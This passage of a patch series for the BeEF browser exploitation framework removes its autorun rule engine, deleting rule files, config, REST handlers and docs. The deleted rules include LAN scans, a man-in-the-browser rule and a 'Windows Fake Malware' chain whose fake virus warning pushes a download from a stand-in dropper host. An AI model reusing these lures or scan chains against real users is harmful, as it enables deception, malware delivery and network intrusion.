"options": { - "ipRange":"<<mod_input>>", - "ports":"80,8080", - "threads":"2", - "timeout":"5" - } - } - ], - "execution_order": [0, 1], - "execution_delay": [0, 0], - "chain_mode": "nested-forward" -} diff --git a/arerules/lan_flash_scan_common.json b/arerules/lan_flash_scan_common.json deleted file mode 100644 index 859febf958..0000000000 --- a/arerules/lan_flash_scan_common.json +++ /dev/null @@ -1,19 +0,0 @@ -{"name": "LAN Flash Scan (Common IPs)", - "author": "bcoles", - "browser": ["FF", "C"], - "modules": [ - {"name": "cross_origin_scanner_flash", - "condition": null, - "code": null, - "options": { - "ipRange":"common", - "ports":"80,8080", - "threads":"2", - "timeout":"5" - } - } - ], - "execution_order": [0], - "execution_delay": [0], - "chain_mode": "sequential" -} diff --git a/arerules/lan_http_scan.json b/arerules/lan_http_scan.json deleted file mode 100644 index ce900f5061..0000000000 --- a/arerules/lan_http_scan.json +++ /dev/null @@ -1,25 +0,0 @@ -{"name": "LAN HTTP Scan", - "author": "bcoles", - "browser": ["FF", "C"], - "modules": [ - {"name": "get_internal_ip_webrtc", - "condition": null, - "code": null, - "options": {} - }, - {"name": "get_http_servers", - "condition": "status==1", - "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;", - "options": { - "rhosts":"<<mod_input>>", - "ports":"80,8080", - "threads":"3", - "wait":"5", - "timeout":"10" - } - } - ], - "execution_order": [0, 1], - "execution_delay": [0, 0], - "chain_mode": "nested-forward" -} diff --git a/arerules/lan_http_scan_common.json b/arerules/lan_http_scan_common.json deleted file mode 100644 index 238a04983b..0000000000 --- a/arerules/lan_http_scan_common.json +++ /dev/null @@ -1,19 +0,0 @@ -{"name": "LAN HTTP Scan (Common IPs)", - "author": "bcoles", - "modules": [ - {"name": "get_http_servers", - "condition": null, - "code": null, - "options": { - "rhosts":"common", - "ports":"80,8080", - "threads":"3", - "wait":"5", - "timeout":"10" - } - } - ], - "execution_order": [0], - "execution_delay": [0], - "chain_mode": "sequential" -} diff --git a/arerules/lan_ping_sweep.json b/arerules/lan_ping_sweep.json deleted file mode 100644 index 8f58ccc013..0000000000 --- a/arerules/lan_ping_sweep.json +++ /dev/null @@ -1,22 +0,0 @@ -{"name": "LAN Ping Sweep", - "author": "bcoles", - "browser": "FF", - "modules": [ - {"name": "get_internal_ip_webrtc", - "condition": null, - "code": null, - "options": {} - }, - {"name": "ping_sweep", - "condition": "status==1", - "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;", - "options": { - "rhosts":"<<mod_input>>", - "threads":"3" - } - } - ], - "execution_order": [0, 1], - "execution_delay": [0, 0], - "chain_mode": "nested-forward" -} diff --git a/arerules/lan_ping_sweep_common.json b/arerules/lan_ping_sweep_common.json deleted file mode 100644 index 4c21b7f3d0..0000000000 --- a/arerules/lan_ping_sweep_common.json +++ /dev/null @@ -1,17 +0,0 @@ -{"name": "LAN Ping Sweep (Common IPs)", - "author": "bcoles", - "browser": "FF", - "modules": [ - {"name": "ping_sweep", - "condition": null, - "code": null, - "options": { - "rhosts":"common", - "threads":"3" - } - } - ], - "execution_order": [0], - "execution_delay": [0], - "chain_mode": "sequential" -} diff --git a/arerules/lan_port_scan.json b/arerules/lan_port_scan.json deleted file mode 100644 index 47d72e25f0..0000000000 --- a/arerules/lan_port_scan.json +++ /dev/null @@ -1,25 +0,0 @@ -{"name": "LAN Port Scan", - "author": "aburro & aussieklutz", - "modules": [ - {"name": "get_internal_ip_webrtc", - "condition": null, - "code": null, - "options": {} - }, - {"name": "port_scanner", - "condition": "status==1", - "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.'+s[3]; var mod_input = start;", - "options": { - "ipHost":"<<mod_input>>", - "ports":"80,8080", - "closetimeout":"1100", - "opentimeout":"2500", - "delay":"600", - "debug":"false" - } - } - ], - "execution_order": [0, 1], - "execution_delay": [0, 0], - "chain_mode": "nested-forward" -} diff --git a/arerules/lan_sw_port_scan.json b/arerules/lan_sw_port_scan.json deleted file mode 100644 index 2405dc7782..0000000000 --- a/arerules/lan_sw_port_scan.json +++ /dev/null @@ -1,21 +0,0 @@ -{"name": "LAN SW Port Scan", - "author": "aburro & aussieklutz", - "modules": [ - {"name": "get_internal_ip_webrtc", - "condition": null, - "code": null, - "options": {} - }, - {"name": "sw_port_scanner", - "condition": "status==1", - "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.'+s[3]; var mod_input = start;", - "options": { - "ipHost":"192.168.1.10", - "ports":"80,8080" - } - } - ], - "execution_order": [0, 1], - "execution_delay": [0, 0], - "chain_mode": "nested-forward" -} diff --git a/arerules/man_in_the_browser.json b/arerules/man_in_the_browser.json deleted file mode 100644 index 31f9c370ef..0000000000 --- a/arerules/man_in_the_browser.json +++ /dev/null @@ -1,13 +0,0 @@ -{"name": "Perform Man-In-The-Browser", - "author": "mgeeky", - "modules": [ - {"name": "man_in_the_browser", - "condition": null, - "code": null, - "options": {} - } - ], - "execution_order": [0], - "execution_delay": [0], - "chain_mode": "sequential" -} diff --git a/arerules/raw_javascript.json b/arerules/raw_javascript.json deleted file mode 100644 index 6e7bca3e7d..0000000000 --- a/arerules/raw_javascript.json +++ /dev/null @@ -1,15 +0,0 @@ -{ - "name": "Raw JavaScript", - "author": "wade@bindshell.net", - "modules": [ - {"name": "raw_javascript", - "condition": null, - "options": { - "cmd": "alert(0xBeEF);" - } - } - ], - "execution_order": [0], - "execution_delay": [0], - "chain_mode": "sequential" -} diff --git a/arerules/record_snapshots.json b/arerules/record_snapshots.json deleted file mode 100644 index 9d0178699d..0000000000 --- a/arerules/record_snapshots.json +++ /dev/null @@ -1,15 +0,0 @@ -{"name": "Collects multiple snapshots of the webpage within Same-Origin", - "author": "mgeeky", - "modules": [ - {"name": "spyder_eye", - "condition": null, - "options": { - "repeat":"10", - "delay":"3000" - } - } - ], - "execution_order": [0], - "execution_delay": [0], - "chain_mode": "sequential" -} diff --git a/arerules/win_fake_malware.json b/arerules/win_fake_malware.json deleted file mode 100644 index f0daf95809..0000000000 --- a/arerules/win_fake_malware.json +++ /dev/null @@ -1,35 +0,0 @@ -// note: update your dropper URL (dropper.local) in each of the modules below -{ - "name": "Windows Fake Malware", - "author": "bcoles", - "os": "Windows", - "modules": [ - { - "name": "blockui", - "condition": null, - "options": { - "message": "<img src='data:image/png;base64,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'/><p>This is an important security warning. Your system is infected with a virus. It's strongly advised that you run the provided malware removal tool to fix your computer before you do any shopping online. <p><a href='http://dropper.local/malware_removal_tool.exe' onclick='$j.unblockUI();'>Microsoft Malware Removal Toolkit</a></p>", - "timeout": "9999" - } - }, - { - "name": "text_to_voice", - "condition": null, - "options": { - "message": "This is an important security warning. Your system is infected with a virus. It's strongly advised that you run the provided malware removal tool to fix your computer; before you do any shopping online.", - "language": "en" - } - }, - { - "name": "fake_notification_ie", - "condition": null, - "options": { - "url": "http://dropper.local/malware_removal_tool.exe", - "notification_text": "SECURITY WARNING: Download the <a href='http://dropper.local/malware_removal_tool.exe' title='Microsoft Malware Removal Toolkit'>Microsoft Malware Removal Toolkit</a> as soon as possible." - } - } - ], - "execution_order": [0,1,2], - "execution_delay": [0,0,0], - "chain_mode": "sequential" -} diff --git a/config.yaml b/config.yaml index d054bd66f8..74e3179a08 100644 --- a/config.yaml +++ b/config.yaml @@ -102,19 +102,6 @@ beef: database: file: "beef.db" - # Autorun Rule Engine - autorun: - # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval - # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually - # continue execution regardless of results. - # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout. - result_poll_interval: 300 - result_poll_timeout: 5000 - - # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain. - # This is useful to call modules (nested-forward chain mode) that are not returning their status/results. - continue_after_timeout: true - # Enables DNS lookups on zombie IP addresses dns_hostname_lookup: false diff --git a/core/main/handlers/hookedbrowsers.rb b/core/main/handlers/hookedbrowsers.rb index b15ad1b08e..2f173b98af 100644 --- a/core/main/handlers/hookedbrowsers.rb +++ b/core/main/handlers/hookedbrowsers.rb @@ -113,13 +113,6 @@ def confirm_browser_user_agent(user_agent) zombie_commands = BeEF::Core::Models::Command.where(hooked_browser_id: hooked_browser.id, instructions_sent: false) zombie_commands.each { |command| add_command_instructions(command, hooked_browser) } - # @note Check if there are any ARE rules to be triggered. If is_sent=false rules are triggered - are_executions = BeEF::Core::Models::Execution.where(is_sent: false, session_id: hook_session_id) - are_executions.each do |are_exec| - @body += are_exec.mod_body - are_exec.update(is_sent: true, exec_time: Time.new.to_i) - end - # @note We dynamically get the list of all browser hook handler using the API and register them BeEF::API::Registrar.instance.fire(BeEF::API::Server::Hook, 'pre_hook_send', hooked_browser, @body, params, request, response) else diff --git a/core/main/rest/api.rb b/core/main/rest/api.rb index 207c596ff4..b18341d6ba 100644 --- a/core/main/rest/api.rb +++ b/core/main/rest/api.rb @@ -48,12 +48,6 @@ def self.mount_handler(server) end end - module RegisterAutorunHandler - def self.mount_handler(server) - server.mount('/api/autorun', BeEF::Core::Rest::AutorunEngine.new) - end - end - BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler') BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterBrowserDetailsHandler, BeEF::API::Server, 'mount_handler') BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler') @@ -61,7 +55,6 @@ def self.mount_handler(server) BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler') BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler') BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterServerHandler, BeEF::API::Server, 'mount_handler') - BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAutorunHandler, BeEF::API::Server, 'mount_handler') # # Check the source IP is within the permitted subnet From 4e6de7a6769d5838e13662dfc648f594bea4332b Mon Sep 17 00:00:00 2001 From: kaitoozawa <kaitozaw@gmail.com> Date: Mon, 29 Dec 2025 13:36:45 +1000 Subject: [PATCH 7/9] Remove obsolete ARE-related comments missed in earlier changes --- core/main/rest/handlers/hookedbrowsers.rb | 2 -- modules/ipec/inter_protocol_posix_bindshell/module.rb | 2 -- 2 files changed, 4 deletions(-) diff --git a/core/main/rest/handlers/hookedbrowsers.rb b/core/main/rest/handlers/hookedbrowsers.rb index 5b5c0c475f..6362a84e3e 100644 --- a/core/main/rest/handlers/hookedbrowsers.rb +++ b/core/main/rest/handlers/hookedbrowsers.rb @@ -133,8 +133,6 @@ class HookedBrowsers < BeEF::Core::Router::Router BeEF::Core::Models::BrowserDetails.create(session_id: hb.session, detail_key: 'host.os.version', detail_value: os_version) BeEF::Core::Models::BrowserDetails.create(session_id: hb.session, detail_key: 'Arch', detail_value: arch) - # TODO: if there where any ARE rules defined for this hooked browser, - # after updating OS/arch, force a retrigger of the rule. { 'success' => true }.to_json end diff --git a/modules/ipec/inter_protocol_posix_bindshell/module.rb b/modules/ipec/inter_protocol_posix_bindshell/module.rb index 58016facb5..51e1e493a2 100644 --- a/modules/ipec/inter_protocol_posix_bindshell/module.rb +++ b/modules/ipec/inter_protocol_posix_bindshell/module.rb @@ -39,8 +39,6 @@ # # o Returning the shell command results is not supported in Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe. The shell commands are executed on the target shell however. # -# o This module is incompatible with autorun. Upon completing the shell commands it will load the original hooked window in a child iframe resulting in an additional hook. This will result in an infinite loop if this module is set to autorun. -# class Inter_protocol_posix_bindshell < BeEF::Core::Command def self.options From ffc86bd77acdacff10756d20a170ae9822a43c39 Mon Sep 17 00:00:00 2001 From: zinduolis <ilgakulnis@gmail.com> Date: Wed, 11 Mar 2026 09:34:45 +1000 Subject: [PATCH 8/9] Fix required changes from PR review --- core/main/client/status.js | 8 +-- tools/rest_api_examples/lib/beef_rest_api.rb | 64 -------------------- 2 files changed, 4 insertions(+), 68 deletions(-) diff --git a/core/main/client/status.js b/core/main/client/status.js index e7433d9191..1ef1369ee8 100644 --- a/core/main/client/status.js +++ b/core/main/client/status.js @@ -1,5 +1,5 @@ // -// Copyright (c) 2006-2025 Wade Alcorn - wade@bindshell.net +// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - https://beefproject.com // See the file 'doc/COPYING' for copying permission // @@ -17,7 +17,7 @@ beef.status = { * @method success * @return {number} 1 */ - success: function(){ + success: function () { return 1; }, /** @@ -26,7 +26,7 @@ beef.status = { * @method unknown * @return {number} 0 */ - unknown: function(){ + unknown: function () { return 0; }, /** @@ -35,7 +35,7 @@ beef.status = { * @method error * @return {number} -1 */ - error: function(){ + error: function () { return -1; } }; diff --git a/tools/rest_api_examples/lib/beef_rest_api.rb b/tools/rest_api_examples/lib/beef_rest_api.rb index b3705c0894..c9e15482f4 100644 --- a/tools/rest_api_examples/lib/beef_rest_api.rb +++ b/tools/rest_api_examples/lib/beef_rest_api.rb @@ -465,70 +465,6 @@ def dns_delete_rule(id) end -################################################################################ -### Autorun -################################################################################ - -def autorun_rules - print_verbose "Retrieving Autorun rules" - response = RestClient.get "#{@url}autorun/rules", {:params => {:token => @token}} - details = JSON.parse(response.body) - print_good("Retrieved #{details['count']} rules") - details -rescue => e - print_error("Could not retrieve Autorun rules: #{e.message}") -end - -def autorun_delete_rule(id) - print_verbose "Deleting Autorun rule with ID: #{id}" - response = RestClient.delete "#{@url}autorun/rule/#{id}?token=#{@token}" - details = JSON.parse(response.body) - print_good("Deleted rule [id: #{id}]") - details -rescue => e - print_error("Could not delete Autorun rule: #{e.message}") -end - -def autorun_add_rule(data) - print_verbose "Adding Autorun rule: #{data}" - response = RestClient.post "#{@url}autorun/rule/add?token=#{@token}", - data.to_json, - :content_type => :json, - :accept => :json - details = JSON.parse(response.body) - rule_id = details['rule_id'] - - if rule_id.nil? - print_error("Could not add Autorun rule: #{details['error']}") - return details - end - - print_good("Added rule [id: #{details['id']}]") - details -rescue => e - print_error("Could not add Autorun rule: #{e.message}") -end - -def autorun_run_rule_on_all_browsers(rule_id) - print_verbose "Running Autorun rule #{rule_id} on all browsers" - response = RestClient.get "#{@url}autorun/run/#{rule_id}", {:params => {:token => @token}} - details = JSON.parse(response.body) - print_debug details - print_good('Done') - details -rescue => e - print_error "Could not run Autorun rule #{rule_id}: #{e.message}" -end - -def autorun_run_rule_on_browser(rule_id, hb_id) - print_verbose "Running Autorun rule #{rule_id} on browser #{hb_id}" - response = RestClient.get "#{@url}autorun/run/#{rule_id}/#{hb_id}", {:params => {:token => @token}} - details = JSON.parse(response.body) - print_good('Done') - details -rescue => e - print_error "Could not run Autorun rule #{rule_id}: #{e.message}" -end ################################################################################ From d099e578ba65d0f10a58c4de04069f6356993dbc Mon Sep 17 00:00:00 2001 From: zinduolis <ilgakulnis@gmail.com> Date: Wed, 11 Mar 2026 18:24:44 +1000 Subject: [PATCH 9/9] Remove remaining ARE remnants and regenerate JSDoc MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - Delete tools/rest_api_examples/autorun example script - Remove autorun config section from spec fixture configs - Regenerate JSDoc: beef.are → beef.status in navigation - Delete stale doc pages (are.js, beef.are, browser_jools, etc.) --- docs/BeefJS.html | 4 +- docs/are.js.html | 92 -- docs/beef.browser.cookie.html | 4 +- docs/beef.browser.html | 4 +- docs/beef.browser.popup.html | 4 +- docs/beef.dom.html | 4 +- docs/beef.encode.base64.html | 4 +- docs/beef.encode.json.html | 4 +- docs/beef.geolocation.html | 4 +- docs/beef.hardware.html | 4 +- docs/beef.init.html | 7 +- docs/beef.js.html | 4 +- docs/beef.logger.html | 4 +- docs/beef.mitb.html | 4 +- docs/beef.net.connection.html | 4 +- docs/beef.net.cors.html | 4 +- docs/beef.net.dns.html | 4 +- docs/beef.net.html | 4 +- docs/beef.net.local.html | 4 +- docs/beef.net.portscanner.html | 4 +- docs/beef.net.requester.html | 4 +- docs/beef.net.xssrays.html | 4 +- docs/beef.os.html | 4 +- docs/beef.session.html | 4 +- docs/{beef.are.html => beef.status.html} | 33 +- docs/beef.timeout.html | 4 +- docs/beef.updater.html | 4 +- docs/beef.webrtc.html | 4 +- docs/beef.websocket.html | 4 +- docs/browser.js.html | 4 +- docs/browser_cookie.js.html | 4 +- docs/browser_jools.html | 1165 ---------------- docs/browser_popup.js.html | 4 +- docs/dom.js.html | 4 +- docs/encode_base64.js.html | 4 +- docs/encode_json.js.html | 4 +- docs/geolocation.js.html | 4 +- docs/global.html | 4 +- docs/hardware.js.html | 4 +- docs/index.html | 6 +- docs/init.js.html | 5 +- docs/lib_browser_jools.js.html | 1598 ---------------------- docs/lib_deployJava.js.html | 1346 ------------------ docs/lib_platform.js.html | 4 +- docs/logger.js.html | 4 +- docs/mitb.js.html | 4 +- docs/net.js.html | 4 +- docs/net_connection.js.html | 4 +- docs/net_cors.js.html | 4 +- docs/net_dns.js.html | 4 +- docs/net_local.js.html | 4 +- docs/net_portscanner.js.html | 4 +- docs/net_requester.js.html | 4 +- docs/net_xssrays.js.html | 4 +- docs/os.js.html | 4 +- docs/platform.html | 1147 ---------------- docs/session.js.html | 4 +- docs/status.js.html | 93 ++ docs/timeout.js.html | 4 +- docs/updater.js.html | 4 +- docs/webrtc.js.html | 4 +- docs/websocket.js.html | 4 +- spec/support/assets/config_new.yaml | 13 - spec/support/assets/config_old.yaml | 13 - tools/rest_api_examples/autorun | 102 -- 65 files changed, 222 insertions(+), 5606 deletions(-) delete mode 100644 docs/are.js.html rename docs/{beef.are.html => beef.status.html} (52%) delete mode 100644 docs/browser_jools.html delete mode 100644 docs/lib_browser_jools.js.html delete mode 100644 docs/lib_deployJava.js.html delete mode 100644 docs/platform.html create mode 100644 docs/status.js.html delete mode 100644 tools/rest_api_examples/autorun diff --git a/docs/BeefJS.html b/docs/BeefJS.html index afb749dde4..80c9b884f3 100644 --- a/docs/BeefJS.html +++ b/docs/BeefJS.html @@ -552,13 +552,13 @@ <h4 class="name" id=".regCmp"><span class="type-signature">(static) </span>regCm </div> <nav> - <h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="BeefJS.html">BeefJS</a></li><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li></ul><h3>Global</h3><ul><li><a href="global.html#platform">platform</a></li></ul> + <h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="BeefJS.html">BeefJS</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.status.html">status</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li></ul><h3>Global</h3><ul><li><a href="global.html#platform">platform</a></li></ul> </nav> <br class="clear"> <footer> - Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 4.0.4</a> on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 4.0.5</a> on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard 